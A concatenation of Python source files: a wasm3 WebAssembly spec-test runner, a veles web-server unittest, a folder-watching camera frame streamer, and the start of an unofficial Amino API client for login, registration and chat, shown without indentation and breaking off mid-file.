# - Get more tests from: https://github.com/microsoft/ChakraCore/tree/master/test/WasmSpec
# - Fix "Empty Stack" check
# - Check Canonical NaN and Arithmetic NaN separately
# - Fix imports.wast
import argparse
import os, sys, glob, time
import subprocess
import json
import re
import struct
import math
import pathlib
scriptDir = os.path.dirname(os.path.abspath(sys.argv[0]))
sys.path.append(os.path.join(scriptDir, '..', 'extra'))
from testutils import *
from pprint import pprint
#
# Args handling
#
parser = argparse.ArgumentParser()
parser.add_argument("--exec", metavar="<interpreter>", default="../build/wasm3 --repl")
parser.add_argument("--spec", default="v1.1")
parser.add_argument("--timeout", type=int, default=30)
parser.add_argument("--line", metavar="<source line>", type=int)
parser.add_argument("--all", action="store_true")
parser.add_argument("--show-logs", action="store_true")
parser.add_argument("--format", choices=["raw", "hex", "fp"], default="fp")
parser.add_argument("-v", "--verbose", action="store_true")
parser.add_argument("-s", "--silent", action="store_true")
parser.add_argument("file", nargs='*')
args = parser.parse_args()
if args.line:
args.show_logs = True
#
# Utilities
#
log = open("spec-test.log","w+")
log.write("======================\n")
def warning(msg, force=False):
log.write("Warning: " + msg + "\n")
log.flush()
if args.verbose or force:
print(f"{ansi.WARNING}Warning:{ansi.ENDC} {msg}")
def fatal(msg):
log.write("Fatal: " + msg + "\n")
log.flush()
print(f"{ansi.FAIL}Fatal:{ansi.ENDC} {msg}")
sys.exit(1)
def binaryToFloat(num, t):
if t == "f32":
return struct.unpack('!f', struct.pack('!L', int(num)))[0]
elif t == "f64":
return struct.unpack('!d', struct.pack('!Q', int(num)))[0]
else:
fatal(f"Unknown type '{t}'")
def escape_str(s):
if s == "":
return r'\x00'
if all((ord(c) < 128 and c.isprintable() and not c in " \n\r\t\\") for c in s):
return s
return '\\x' + '\\x'.join('{0:02x}'.format(x) for x in s.encode('utf-8'))
#
# Value format options
#
def formatValueRaw(num, t):
return str(num)
def formatValueHex(num, t):
if t == "f32" or t == "i32":
return "{0:#0{1}x}".format(int(num), 8+2)
elif t == "f64" or t == "i64":
return "{0:#0{1}x}".format(int(num), 16+2)
else:
return str(num)
def formatValueFloat(num, t):
if t == "f32":
s = 6
elif t == "f64":
s = 10
else:
return str(num)
result = "{0:.{1}f}".format(binaryToFloat(num, t), s).rstrip('0')
if result.endswith('.'): result = result + '0'
if len(result) > s*2:
result = "{0:.{1}e}".format(binaryToFloat(num, t), s)
return result
formaters = {
'raw': formatValueRaw,
'hex': formatValueHex,
'fp': formatValueFloat,
}
formatValue = formaters[args.format]
if args.format == "fp":
print("When using fp display format, values are compared loosely (some tests may produce false positives)")
#
# Spec tests preparation
#
if not (os.path.isdir("./core") and os.path.isdir("./proposals")):
from io import BytesIO
from zipfile import ZipFile
from urllib.request import urlopen
officialSpec = f"https://github.com/wasm3/wasm-core-testsuite/archive/{args.spec}.zip"
print(f"Downloading {officialSpec}")
resp = urlopen(officialSpec)
with ZipFile(BytesIO(resp.read())) as zipFile:
for zipInfo in zipFile.infolist():
if re.match(r".*-.*/.*/.*(\.wasm|\.json)", zipInfo.filename):
parts = pathlib.Path(zipInfo.filename).parts
newpath = str(pathlib.Path(*parts[1:-1]))
newfn = str(pathlib.Path(*parts[-1:]))
ensure_path(newpath)
newpath = newpath + "/" + newfn
zipInfo.filename = newpath
zipFile.extract(zipInfo)
#
# Wasm3 REPL
#
from subprocess import Popen, STDOUT, PIPE
from threading import Thread
from queue import Queue, Empty
import shlex
class Wasm3():
def __init__(self, exe):
self.exe = exe
self.p = None
self.loaded = None
self.timeout = args.timeout
self.autorestart = True
self.run()
def run(self):
if self.p:
self.terminate()
cmd = shlex.split(self.exe)
#print(f"wasm3: Starting {' '.join(cmd)}")
self.q = Queue()
self.p = Popen(cmd, bufsize=0, stdin=PIPE, stdout=PIPE, stderr=STDOUT)
def _read_output(out, queue):
for data in iter(lambda: out.read(1024), b''):
queue.put(data)
queue.put(None)
self.t = Thread(target=_read_output, args=(self.p.stdout, self.q))
self.t.daemon = True
self.t.start()
try:
self._read_until("wasm3> ")
except Exception as e:
print(f"wasm3: Could not start: {e}")
def restart(self):
print(f"wasm3: Restarting")
for i in range(10):
try:
self.run()
try:
if self.loaded:
self.load(self.loaded)
except Exception as e:
pass
break
except Exception as e:
print(f"wasm3: {e} => retry")
time.sleep(0.1)
def init(self):
return self._run_cmd(f":init\n")
def version(self):
return self._run_cmd(f":version\n")
def load(self, fn):
self.loaded = None
with open(fn,"rb") as f:
wasm = f.read()
res = self._run_cmd(f":load-hex {len(wasm)}\n{wasm.hex()}\n")
self.loaded = fn
return res
def invoke(self, cmd):
return self._run_cmd(":invoke " + " ".join(map(str, cmd)) + "\n")
def _run_cmd(self, cmd):
if self.autorestart and not self._is_running():
self.restart()
self._flush_input()
#print(f"wasm3: {cmd.strip()}")
self._write(cmd)
return self._read_until("wasm3> ")
def _read_until(self, token):
buff = ""
tout = time.time() + self.timeout
error = None
while time.time() < tout:
try:
data = self.q.get(timeout=0.1)
if data == None:
error = "Crashed"
break
buff = buff + data.decode("utf-8")
idx = buff.rfind(token)
if idx >= 0:
return buff[0:idx].strip()
except Empty:
pass
else:
error = "Timeout"
self.terminate()
raise Exception(error)
def _write(self, data):
self.p.stdin.write(data.encode("utf-8"))
self.p.stdin.flush()
def _is_running(self):
return self.p and (self.p.poll() == None)
def _flush_input(self):
while not self.q.empty():
self.q.get()
def terminate(self):
self.p.stdin.close()
self.p.terminate()
self.p.wait(timeout=1.0)
self.p = None
#
# Actual test
#
wasm3 = Wasm3(args.exec)
wasm3_ver = wasm3.version()
print(wasm3_ver)
blacklist = Blacklist([
"float_exprs.wast:* f32.nonarithmetic_nan_bitpattern*",
"imports.wast:*",
"names.wast:* *.wasm \\x00*", # names that start with '\0'
])
if wasm3_ver in Blacklist(["* on i386* MSVC *", "* on i386* Clang * for Windows"]):
warning("Win32 x86 has i64->f32 conversion precision issues, skipping some tests", True)
# See: https://docs.microsoft.com/en-us/cpp/c-runtime-library/floating-point-support
blacklist.add([
"conversions.wast:* f32.convert_i64_u(9007199791611905)",
"conversions.wast:* f32.convert_i64_u(9223371761976868863)",
"conversions.wast:* f32.convert_i64_u(9223372586610589697)",
])
elif wasm3_ver in Blacklist(["* on mips* GCC *"]):
warning("MIPS has NaN representation issues, skipping some tests", True)
blacklist.add([
"float_exprs.wast:* *_nan_bitpattern(*",
"float_exprs.wast:* *no_fold_*",
])
elif wasm3_ver in Blacklist(["* on sparc* GCC *"]):
warning("SPARC has NaN representation issues, skipping some tests", True)
blacklist.add([
"float_exprs.wast:* *.canonical_nan_bitpattern(0, 0)",
])
stats = dotdict(total_run=0, skipped=0, failed=0, crashed=0, timeout=0, success=0, missing=0)
# Convert some trap names from the original spec
trapmap = {
"unreachable": "unreachable executed"
}
def runInvoke(test):
test.cmd = [test.action.field]
displayArgs = []
for arg in test.action.args:
test.cmd.append(arg['value'])
displayArgs.append(formatValue(arg['value'], arg['type']))
test_id = f"{test.source} {test.wasm} {test.cmd[0]}({', '.join(test.cmd[1:])})"
if test_id in blacklist and not args.all:
warning(f"Skipped {test_id} (blacklisted)")
stats.skipped += 1
return
if args.verbose:
print(f"Running {test_id}")
stats.total_run += 1
output = ""
actual = None
actual_val = None
force_fail = False
try:
output = wasm3.invoke(test.cmd)
except Exception as e:
actual = f"<{e}>"
force_fail = True
# Parse the actual output
if not actual:
result = re.findall(r'Result: (.*?)$', "\n" + output + "\n", re.MULTILINE)
if len(result) > 0:
actual = "result " + result[-1]
actual_val = result[0]
if not actual:
result = re.findall(r'Error: \[trap\] (.*?) \(', "\n" + output + "\n", re.MULTILINE)
if len(result) > 0:
actual = "trap " + result[-1]
if not actual:
result = re.findall(r'Error: (.*?)$', "\n" + output + "\n", re.MULTILINE)
if len(result) > 0:
actual = "error " + result[-1]
if not actual:
actual = "<No Result>"
force_fail = True
if actual == "error no operation ()":
actual = "<Not Implemented>"
stats.missing += 1
force_fail = True
elif actual == "<Crashed>":
stats.crashed += 1
force_fail = True
elif actual == "<Timeout>":
stats.timeout += 1
force_fail = True
# Prepare the expected result
expect = None
if "expected" in test:
if len(test.expected) == 0:
expect = "result <Empty Stack>"
elif len(test.expected) == 1:
t = test.expected[0]['type']
value = str(test.expected[0]['value'])
expect = "result " + value
if actual_val != None:
if (t == "f32" or t == "f64") and (value == "nan:canonical" or value == "nan:arithmetic"):
val = binaryToFloat(actual_val, t)
#warning(f"{actual_val} => {val}")
if math.isnan(val):
actual = "nan:any"
expect = "nan:any"
else:
expect = "result " + formatValue(value, t)
actual = "result " + formatValue(actual_val, t)
else:
warning(f"Test {test.source} specifies multiple results")
expect = "result <Multiple>"
elif "expected_trap" in test:
if test.expected_trap in trapmap:
test.expected_trap = trapmap[test.expected_trap]
expect = "trap " + str(test.expected_trap)
elif "expected_anything" in test:
expect = "<Anything>"
else:
expect = "<Unknown>"
def showTestResult():
print(" ----------------------")
print(f"Test: {ansi.HEADER}{test_id}{ansi.ENDC}")
print(f"Args: {', '.join(displayArgs)}")
print(f"Expected: {ansi.OKGREEN}{expect}{ansi.ENDC}")
print(f"Actual: {ansi.WARNING}{actual}{ansi.ENDC}")
if args.show_logs and len(output):
print(f"Log:")
print(output)
log.write(f"{test.source}\t|\t{test.wasm} {test.action.field}({', '.join(displayArgs)})\t=>\t\t")
if actual == expect or (expect == "<Anything>" and not force_fail):
stats.success += 1
log.write(f"OK: {actual}\n")
if args.line:
showTestResult()
else:
stats.failed += 1
log.write(f"FAIL: {actual}, should be: {expect}\n")
if args.silent: return
showTestResult()
#sys.exit(1)
if args.file:
jsonFiles = args.file
else:
jsonFiles = glob.glob(os.path.join(".", "core", "*.json"))
jsonFiles += glob.glob(os.path.join(".", "proposals", "sign-extension-ops", "*.json"))
jsonFiles += glob.glob(os.path.join(".", "proposals", "nontrapping-float-to-int-conversions", "*.json"))
jsonFiles = list(map(lambda x: os.path.relpath(x, scriptDir), jsonFiles))
jsonFiles.sort()
for fn in jsonFiles:
with open(fn, encoding='utf-8') as f:
data = json.load(f)
wast_source = filename(data["source_filename"])
wasm_module = ""
print(f"Running {fn}")
wasm3.init()
for cmd in data["commands"]:
test = dotdict()
test.line = int(cmd["line"])
test.source = wast_source + ":" + str(test.line)
test.wasm = wasm_module
test.type = cmd["type"]
if test.type == "module":
wasm_module = cmd["filename"]
if args.verbose:
print(f"Loading {wasm_module}")
try:
wasm_fn = os.path.join(pathname(fn), wasm_module)
res = wasm3.load(wasm_fn)
if res:
warning(res)
except Exception as e:
pass #fatal(str(e))
elif ( test.type == "action" or
test.type == "assert_return" or
test.type == "assert_trap" or
test.type == "assert_exhaustion" or
test.type == "assert_return_canonical_nan" or
test.type == "assert_return_arithmetic_nan"):
if args.line and test.line != args.line:
continue
if test.type == "action":
test.expected_anything = True
elif test.type == "assert_return":
test.expected = cmd["expected"]
elif test.type == "assert_return_canonical_nan":
test.expected = cmd["expected"]
test.expected[0]["value"] = "nan:canonical"
elif test.type == "assert_return_arithmetic_nan":
test.expected = cmd["expected"]
test.expected[0]["value"] = "nan:arithmetic"
elif test.type == "assert_trap":
test.expected_trap = cmd["text"]
elif test.type == "assert_exhaustion":
test.expected_trap = "stack overflow"
else:
stats.skipped += 1
warning(f"Skipped {test.source} ({test.type} not implemented)")
continue
test.action = dotdict(cmd["action"])
if test.action.type == "invoke":
# TODO: invoking in modules not implemented
if test.action.module:
stats.skipped += 1
warning(f"Skipped {test.source} (invoke in module)")
continue
test.action.field = escape_str(test.action.field)
runInvoke(test)
else:
stats.skipped += 1
warning(f"Skipped {test.source} (unknown action type '{test.action.type}')")
# These are irrelevant
elif (test.type == "assert_invalid" or
test.type == "assert_malformed" or
test.type == "assert_uninstantiable"):
pass
# Others - report as skipped
else:
stats.skipped += 1
warning(f"Skipped {test.source} ('{test.type}' not implemented)")
if (stats.failed + stats.success) != stats.total_run:
warning("Statistics summary invalid", True)
pprint(stats)
if stats.failed > 0:
failed = (stats.failed*100)/stats.total_run
print(f"{ansi.FAIL}=======================")
print(f" FAILED: {failed:.2f}%")
if stats.crashed > 0:
print(f" Crashed: {stats.crashed}")
print(f"======================={ansi.ENDC}")
sys.exit(1)
elif stats.success > 0:
print(f"{ansi.OKGREEN}=======================")
print(f" {stats.success}/{stats.total_run} tests OK")
if stats.skipped > 0:
print(f"{ansi.WARNING} ({stats.skipped} tests skipped){ansi.OKGREEN}")
print(f"======================={ansi.ENDC}")
|
test_web_status.py | # -*- coding: utf-8 -*-
"""
.. invisible:
_ _ _____ _ _____ _____
| | | | ___| | | ___/ ___|
| | | | |__ | | | |__ \ `--.
| | | | __|| | | __| `--. \
\ \_/ / |___| |___| |___/\__/ /
\___/\____/\_____|____/\____/
Created on Feb 11, 2014
███████████████████████████████████████████████████████████████████████████████
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing,
software distributed under the License is distributed on an
"AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
KIND, either express or implied. See the License for the
specific language governing permissions and limitations
under the License.
███████████████████████████████████████████████████████████████████████████████
"""
import logging
import threading
import unittest
from veles.config import root
from veles.web_status import WebServer
from veles.tests import timeout
class Test(unittest.TestCase):
def setUp(self):
root.common.web.log_file = "/tmp/veles_web.test.log"
root.common.web.port = 8071
self.ws = WebServer()
def tearDown(self):
pass
@timeout(2)
def testStop(self):
def stop():
self.ws.stop()
stopper = threading.Thread(target=stop)
stopper.start()
self.ws.run()
stopper.join()
if __name__ == "__main__":
logging.basicConfig(level=logging.INFO)
# import sys;sys.argv = ['', 'Test.testStop']
unittest.main()
|
FolderCamera.py | import time
import threading
try:
from greenlet import getcurrent as get_ident
except ImportError:
try:
from thread import get_ident
except ImportError:
from _thread import get_ident
from .FolderWatcher import FolderWatcher
class CameraEvent(object):
"""An Event-like class that signals all active clients when a new frame is
available.
"""
def __init__(self):
self.events = {}
def wait(self):
"""Invoked from each client's thread to wait for the next frame."""
ident = get_ident()
if ident not in self.events:
# this is a new client
# add an entry for it in the self.events dict
# each entry has two elements, a threading.Event() and a timestamp
self.events[ident] = [threading.Event(), time.time()]
return self.events[ident][0].wait()
def set(self):
"""Invoked by the camera thread when a new frame is available."""
now = time.time()
remove = None
for ident, event in self.events.items():
if not event[0].isSet():
# if this client's event is not set, then set it
# also update the last set timestamp to now
event[0].set()
event[1] = now
else:
# if the client's event is already set, it means the client
# did not process a previous frame
# if the event stays set for more than 5 seconds, then assume
# the client is gone and remove it
if now - event[1] > 5:
remove = ident
if remove:
del self.events[remove]
def clear(self):
"""Invoked from each client's thread after a frame was processed."""
self.events[get_ident()][0].clear()
class BaseCamera(object):
thread = None # background thread that reads frames from camera
frame = None # current frame is stored here by background thread
last_access = 0 # time of last client access to the camera
event = CameraEvent()
def __init__(self):
"""Start the background camera thread if it isn't running yet."""
if BaseCamera.thread is None:
BaseCamera.last_access = time.time()
# start background frame thread
BaseCamera.thread = threading.Thread(target=self._thread)
BaseCamera.thread.start()
# wait until frames are available
while self.get_frame() is None:
time.sleep(0)
def get_frame(self):
"""Return the current camera frame."""
BaseCamera.last_access = time.time()
# wait for a signal from the camera thread
BaseCamera.event.wait()
BaseCamera.event.clear()
return BaseCamera.frame
@staticmethod
def frames():
""""Generator that returns frames from the camera."""
raise RuntimeError('Must be implemented by subclasses.')
@classmethod
def _thread(cls):
"""Camera background thread."""
print('Starting camera thread.')
frames_iterator = cls.frames()
for frame in frames_iterator:
BaseCamera.frame = frame
BaseCamera.event.set() # send signal to clients
time.sleep(0)
# if there hasn't been any clients asking for frames in
# the last 10 seconds then stop the thread
if time.time() - BaseCamera.last_access > 10:
frames_iterator.close()
print('Stopping camera thread due to inactivity.')
break
BaseCamera.thread = None
class FolderCamera(BaseCamera):
@staticmethod
def frames():
fWatcher = FolderWatcher()
while True:
fWatcher.refreshImagesList()
time.sleep(1)
yield(fWatcher.getFrame())
|
client.py | # import hmac
import json
import base64
from hashlib import sha1
import requests
import threading
import time
from uuid import UUID
from os import urandom
from time import timezone, sleep
from typing import BinaryIO
from binascii import hexlify
from time import time as timestamp
from locale import getdefaultlocale as locale
from .lib.util import device, headers, helpers, exceptions, objects
from .socket import Callbacks, SocketHandler
device = device.DeviceGenerator()
class Client(Callbacks, SocketHandler):
def __init__(self, deviceId: str = None, proxies: dict = None, certificatePath = None, socket_trace = False, socketDebugging = False):
self.api = "https://service.narvii.com/api/v1"
self.authenticated = False
self.configured = False
self.user_agent = device.user_agent
if deviceId is not None: self.device_id = deviceId
else: self.device_id = device.device_id
SocketHandler.__init__(self, self, socket_trace=socket_trace, debug=socketDebugging)
Callbacks.__init__(self, self)
self.proxies = proxies
self.certificatePath = certificatePath
self.json = None
self.sid = None
self.userId = None
self.account: objects.UserProfile = objects.UserProfile(None)
self.profile: objects.UserProfile = objects.UserProfile(None)
#self.check_device(self.device_id)
def parse_headers(self, data = None):
if data is not None:
return headers.Headers(data=data, deviceId=self.device_id).headers
else:
return headers.Headers(deviceId=self.device_id).headers
def join_voice_chat(self, comId: str, chatId: str, joinType: int = 1):
"""
Joins a Voice Chat
**Parameters**
- **comId** : ID of the Community
- **chatId** : ID of the Chat
"""
# Made by Light, Ley and Phoenix
data = {
"o": {
"ndcId": int(comId),
"threadId": chatId,
"joinRole": joinType,
"id": "2154531" # Need to change?
},
"t": 112
}
data = json.dumps(data)
self.send(data)
def join_video_chat(self, comId: str, chatId: str, joinType: int = 1):
"""
Joins a Video Chat
**Parameters**
- **comId** : ID of the Community
- **chatId** : ID of the Chat
"""
# Made by Light, Ley and Phoenix
data = {
"o": {
"ndcId": int(comId),
"threadId": chatId,
"joinRole": joinType,
"channelType": 5,
"id": "2154531" # Need to change?
},
"t": 108
}
data = json.dumps(data)
self.send(data)
def join_video_chat_as_viewer(self, comId: str, chatId: str):
data = {
"o":
{
"ndcId": int(comId),
"threadId": chatId,
"joinRole": 2,
"id": "72446"
},
"t": 112
}
data = json.dumps(data)
self.send(data)
def run_vc(self, comId: str, chatId: str, joinType: str):
while self.active:
data = {
"o": {
"ndcId": comId,
"threadId": chatId,
"joinRole": joinType,
"id": "2154531" # Need to change?
},
"t": 112
}
data = json.dumps(data)
self.send(data)
def start_vc(self, comId: str, chatId: str, joinType: int = 1):
data = {
"o": {
"ndcId": comId,
"threadId": chatId,
"joinRole": joinType,
"id": "2154531" # Need to change?
},
"t": 112
}
time.sleep(2)
data = json.dumps(data)
self.send(data)
data = {
"o": {
"ndcId": comId,
"threadId": chatId,
"channelType": 1,
"id": "2154531" # Need to change?
},
"t": 108
}
time.sleep(2)
data = json.dumps(data)
self.send(data)
self.active = True
threading.Thread(target=self.run_vc, args=[comId, chatId, joinType]).start()
def end_vc(self, comId: str, chatId: str, joinType: int = 2):
self.active = False
data = {
"o": {
"ndcId": comId,
"threadId": chatId,
"joinRole": joinType,
"id": "2154531" # Need to change?
},
"t": 112
}
data = json.dumps(data)
self.send(data)
def login_sid(self, SID: str):
"""
Login into an account with an SID
**Parameters**
- **SID** : SID of the account
"""
uId = helpers.sid_to_uid(SID)
self.authenticated = True
self.sid = SID
self.userId = uId
self.account: objects.UserProfile = self.get_user_info(uId)
self.profile: objects.UserProfile = self.get_user_info(uId)
headers.sid = self.sid
self.start()
self.run_socket()
def login(self, email: str, password: str):
"""
Login into an account.
**Parameters**
- **email** : Email of the account.
- **password** : Password of the account.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.src.exceptions>`
"""
data = json.dumps({
"email": email,
"v": 2,
"secret": f"0 {password}",
"deviceID": self.device_id,
"clientType": 100,
"action": "normal",
"timestamp": int(timestamp() * 1000)
})
response = requests.post(f"{self.api}/g/s/auth/login", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
self.run_socket()
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else:
self.authenticated = True
self.json = json.loads(response.text)
self.sid = self.json["sid"]
self.userId = self.json["account"]["uid"]
self.account: objects.UserProfile = objects.UserProfile(self.json["account"]).UserProfile
self.profile: objects.UserProfile = objects.UserProfile(self.json["userProfile"]).UserProfile
headers.sid = self.sid
self.start()
return response.status_code
def register(self, nickname: str, email: str, password: str, verificationCode: str, deviceId: str = device.device_id):
"""
Register an account.
**Parameters**
- **nickname** : Nickname of the account.
- **email** : Email of the account.
- **password** : Password of the account.
- **verificationCode** : Verification code.
- **deviceId** : The device id being registered to.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.src.exceptions>`
"""
data = json.dumps({
"secret": f"0 {password}",
"deviceID": deviceId,
"email": email,
"clientType": 100,
"nickname": nickname,
"latitude": 0,
"longitude": 0,
"address": None,
"clientCallbackURL": "narviiapp://relogin",
"validationContext": {
"data": {
"code": verificationCode
},
"type": 1,
"identity": email
},
"type": 1,
"identity": email,
"timestamp": int(timestamp() * 1000)
})
response = requests.post(f"{self.api}/g/s/auth/register", data=data, headers=self.parse_headers(data=data), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return response.status_code
def restore(self, email: str, password: str):
"""
Restore a deleted account.
**Parameters**
- **email** : Email of the account.
- **password** : Password of the account.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.src.exceptions>`
"""
data = json.dumps({
"secret": f"0 {password}",
"deviceID": device.device_id,
"email": email,
"timestamp": int(timestamp() * 1000)
})
response = requests.post(f"{self.api}/g/s/account/delete-request/cancel", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return response.status_code
def logout(self):
"""
Logout from an account.
**Parameters**
- No parameters required.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.src.exceptions>`
"""
data = json.dumps({
"deviceID": self.device_id,
"clientType": 100,
"timestamp": int(timestamp() * 1000)
})
response = requests.post(f"{self.api}/g/s/auth/logout", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else:
self.authenticated = False
self.json = None
self.sid = None
self.userId = None
self.account: None
self.profile: None
headers.sid = None
self.close()
return response.status_code
def configure(self, age: int, gender: str):
"""
Configure the settings of an account.
**Parameters**
- **age** : Age of the account. Minimum is 13.
- **gender** : Gender of the account.
- ``Male``, ``Female`` or ``Non-Binary``
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.src.exceptions>`
"""
if gender.lower() == "male": gender = 1
elif gender.lower() == "female": gender = 2
elif gender.lower() == "non-binary": gender = 255
else: raise exceptions.SpecifyType()
if age <= 12: raise exceptions.AgeTooLow()
data = json.dumps({
"age": age,
"gender": gender,
"timestamp": int(timestamp() * 1000)
})
response = requests.post(f"{self.api}/g/s/persona/profile/basic", data=data, headers=self.parse_headers(data=data), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return response.status_code
def verify(self, email: str, code: str):
"""
Verify an account.
**Parameters**
- **email** : Email of the account.
- **code** : Verification code.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.src.exceptions>`
"""
data = json.dumps({
"validationContext": {
"type": 1,
"identity": email,
"data": {"code": code}},
"deviceID": device.device_id,
"timestamp": int(timestamp() * 1000)
})
response = requests.post(f"{self.api}/g/s/auth/check-security-validation", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return response.status_code
def request_verify_code(self, email: str, resetPassword: bool = False):
"""
Request an verification code to the targeted email.
**Parameters**
- **email** : Email of the account.
- **resetPassword** : If the code should be for Password Reset.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.src.exceptions>`
"""
data = {
"identity": email,
"type": 1,
"deviceID": device.device_id
}
if resetPassword is True:
data["level"] = 2
data["purpose"] = "reset-password"
data = json.dumps(data)
response = requests.post(f"{self.api}/g/s/auth/request-security-validation", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return response.status_code
def activate_account(self, email: str, code: str):
"""
Activate an account.
**Parameters**
- **email** : Email of the account.
- **code** : Verification code.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.src.exceptions>`
"""
data = json.dumps({
"type": 1,
"identity": email,
"data": {"code": code},
"deviceID": device.device_id
})
response = requests.post(f"{self.api}/g/s/auth/activate-email", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return response.status_code
# Provided by "𝑰 𝑵 𝑻 𝑬 𝑹 𝑳 𝑼 𝑫 𝑬#4082"
def delete_account(self, password: str):
"""
Delete an account.
**Parameters**
- **password** : Password of the account.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.src.exceptions>`
"""
data = json.dumps({
"deviceID": device.device_id,
"secret": f"0 {password}"
})
response = requests.post(f"{self.api}/g/s/account/delete-request", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return response.status_code
def change_password(self, email: str, password: str, code: str):
"""
Change password of an account.
**Parameters**
- **email** : Email of the account.
- **password** : Password of the account.
- **code** : Verification code.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.src.exceptions>`
"""
data = json.dumps({
"updateSecret": f"0 {password}",
"emailValidationContext": {
"data": {
"code": code
},
"type": 1,
"identity": email,
"level": 2,
"deviceID": device.device_id
},
"phoneNumberValidationContext": None,
"deviceID": device.device_id
})
response = requests.post(f"{self.api}/g/s/auth/reset-password", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return response.status_code
def check_device(self, deviceId: str):
"""
Check if the Device ID is valid.
**Parameters**
- **deviceId** : ID of the Device.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = json.dumps({
"deviceID": deviceId,
"bundleID": "com.narvii.amino.master",
"clientType": 100,
"timezone": -timezone // 1000,
"systemPushEnabled": True,
"locale": locale()[0],
"timestamp": int(timestamp() * 1000)
})
response = requests.post(f"{self.api}/g/s/device", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: self.configured = True; return response.status_code
def get_account_info(self):
response = requests.get(f"{self.api}/g/s/account", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.UserProfile(json.loads(response.text)["account"]).UserProfile
def upload_media(self, file: BinaryIO, fileType: str):
"""
Upload file to the amino servers.
**Parameters**
- **file** : File to be uploaded.
**Returns**
- **Success** : Url of the file uploaded to the server.
- **Fail** : :meth:`Exceptions <amino.lib.src.exceptions>`
"""
if fileType == "audio":
t = "audio/aac"
elif fileType == "image":
t = "image/jpg"
else: raise exceptions.SpecifyType(fileType)
data = file.read()
response = requests.post(f"{self.api}/g/s/media/upload", data=data, headers=headers.Headers(type=t, data=data, deviceId=self.device_id).headers, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return json.loads(response.text)["mediaValue"]
def handle_socket_message(self, data):
return self.resolve(data)
def get_eventlog(self):
response = requests.get(f"{self.api}/g/s/eventlog/profile?language=en", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return json.loads(response.text)
def sub_clients(self, start: int = 0, size: int = 25):
"""
List of Communities the account is in.
**Parameters**
- *start* : Where to start the list.
- *size* : Size of the list.
**Returns**
- **Success** : :meth:`Community List <amino.lib.src.objects.CommunityList>`
- **Fail** : :meth:`Exceptions <amino.lib.src.exceptions>`
"""
if not self.authenticated: raise exceptions.NotLoggedIn()
response = requests.get(f"{self.api}/g/s/community/joined?v=1&start={start}&size={size}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.CommunityList(json.loads(response.text)["communityList"]).CommunityList
def sub_clients_profile(self, start: int = 0, size: int = 25):
if not self.authenticated: raise exceptions.NotLoggedIn()
response = requests.get(f"{self.api}/g/s/community/joined?v=1&start={start}&size={size}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return json.loads(response.text)["userInfoInCommunities"]
def get_user_info(self, userId: str):
"""
Information of an User.
**Parameters**
- **userId** : ID of the User.
**Returns**
- **Success** : :meth:`User Object <amino.lib.src.objects.UserProfile>`
- **Fail** : :meth:`Exceptions <amino.lib.src.exceptions>`
"""
response = requests.get(f"{self.api}/g/s/user-profile/{userId}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.UserProfile(json.loads(response.text)["userProfile"]).UserProfile
def get_chat_threads(self, start: int = 0, size: int = 25):
"""
List of Chats the account is in.
**Parameters**
- *start* : Where to start the list.
- *size* : Size of the list.
**Returns**
